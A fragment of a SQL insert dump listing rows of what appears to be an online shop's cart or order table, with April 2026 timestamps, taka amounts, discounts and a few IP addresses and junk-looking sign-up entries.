(951, 1, '2026-04-09 05:27:45', '2026-04-09 05:28:29', NULL, 1, 0, 0, 2, 18.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 772.8000, 772.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 966.0000, 966.0000, 772.8000, 772.8000, 1, 0, NULL, NULL, 0),
(952, 1, '2026-04-09 05:27:52', '2026-04-09 05:27:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(953, 1, '2026-04-09 05:27:53', '2026-04-09 05:27:53', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(954, 1, '2026-04-09 05:27:54', '2026-04-09 05:27:54', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(955, 1, '2026-04-09 05:27:56', '2026-04-09 05:27:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(956, 1, '2026-04-09 05:27:57', '2026-04-09 05:27:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(957, 1, '2026-04-09 05:27:58', '2026-04-09 05:27:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(958, 1, '2026-04-09 06:19:50', '2026-04-09 06:19:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(959, 1, '2026-04-09 06:19:57', '2026-04-09 06:19:57', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '104.28.194.107', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(960, 1, '2026-04-09 06:39:29', '2026-04-09 06:39:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(961, 1, '2026-04-09 06:55:16', '2026-04-09 06:55:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(962, 1, '2026-04-09 06:55:20', '2026-04-09 06:55:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '104.28.194.106', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(963, 1, '2026-04-09 13:04:19', '2026-04-09 13:04:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(964, 1, '2026-04-09 14:01:36', '2026-04-09 14:01:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(965, 1, '2026-04-09 14:21:42', '2026-04-09 14:21:42', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 132, NULL, 1, 'uq.o.h.ah.i.hejo45@gmail.com', NULL, 'vGwUoAeBSyetAkcCeNQol', NULL, 'ZdXOyZUxywvBsPpqCpqmY', NULL, NULL, NULL, 1, 0, '38.135.25.182', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(966, 1, '2026-04-09 21:09:25', '2026-04-09 21:09:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(967, 1, '2026-04-09 22:21:35', '2026-04-09 22:21:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(968, 1, '2026-04-10 09:20:45', '2026-04-10 09:21:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(969, 1, '2026-04-10 16:25:22', '2026-04-10 16:25:50', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(970, 1, '2026-04-10 17:29:17', '2026-04-10 17:29:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 133, NULL, 1, 'uloxu.h.esuj.i.b.45@gmail.com', NULL, 'sDYWbzxJUrWKdIjl', NULL, 'PIfdDCNqHBeRJeOPCwQSf', NULL, NULL, NULL, 1, 0, '185.246.188.74', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(971, 1, '2026-04-10 17:46:48', '2026-04-10 17:46:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(972, 1, '2026-04-10 19:06:03', '2026-04-10 19:06:03', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(973, 1, '2026-04-10 23:17:30', '2026-04-10 23:17:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(974, 1, '2026-04-11 04:15:29', '2026-04-11 04:15:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(975, 1, '2026-04-11 04:15:31', '2026-04-11 04:15:34', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(976, 1, '2026-04-11 04:15:42', '2026-04-11 04:15:44', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(977, 1, '2026-04-11 04:15:47', '2026-04-11 04:15:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(978, 1, '2026-04-11 04:15:52', '2026-04-11 04:15:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(979, 1, '2026-04-11 04:15:55', '2026-04-11 04:15:57', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(980, 1, '2026-04-11 04:15:58', '2026-04-11 04:16:00', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(981, 1, '2026-04-11 04:16:03', '2026-04-11 04:16:08', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(982, 1, '2026-04-11 04:16:09', '2026-04-11 04:16:10', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(983, 1, '2026-04-11 04:16:12', '2026-04-11 04:16:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(984, 1, '2026-04-11 04:16:16', '2026-04-11 04:16:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(985, 1, '2026-04-11 04:16:33', '2026-04-11 04:16:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(986, 1, '2026-04-11 04:16:38', '2026-04-11 04:16:39', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(987, 1, '2026-04-11 04:16:42', '2026-04-11 04:16:42', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(988, 1, '2026-04-11 04:16:58', '2026-04-11 04:17:00', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(989, 1, '2026-04-11 04:17:02', '2026-04-11 04:17:02', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(990, 1, '2026-04-11 04:17:19', '2026-04-11 04:17:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(991, 1, '2026-04-11 04:17:23', '2026-04-11 04:17:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(992, 1, '2026-04-11 04:17:39', '2026-04-11 04:17:43', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(993, 1, '2026-04-11 04:56:27', '2026-04-11 04:56:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(994, 1, '2026-04-11 06:17:32', '2026-04-11 06:17:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(995, 1, '2026-04-11 14:10:32', '2026-04-11 14:10:34', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(996, 1, '2026-04-11 16:10:08', '2026-04-11 16:10:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(997, 1, '2026-04-11 22:16:36', '2026-04-11 22:16:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(998, 1, '2026-04-12 01:15:57', '2026-04-12 01:15:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(999, 1, '2026-04-12 06:20:19', '2026-04-12 06:20:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1000, 1, '2026-04-12 10:24:33', '2026-04-12 10:24:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1001, 1, '2026-04-12 12:31:22', '2026-04-12 12:31:26', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1002, 1, '2026-04-12 14:28:31', '2026-04-12 14:28:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1003, 1, '2026-04-12 16:02:35', '2026-04-12 16:02:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1004, 1, '2026-04-12 16:02:43', '2026-04-12 16:02:43', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1005, 1, '2026-04-12 16:02:44', '2026-04-12 16:02:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1006, 1, '2026-04-12 16:02:44', '2026-04-12 16:02:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1007, 1, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1008, 1, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1009, 1, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1010, 1, '2026-04-12 16:02:46', '2026-04-12 16:02:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1011, 1, '2026-04-12 19:21:36', '2026-04-12 19:22:21', NULL, 1, 0, 0, 2, 18.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 772.8000, 772.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 966.0000, 966.0000, 772.8000, 772.8000, 1, 0, NULL, NULL, 0),
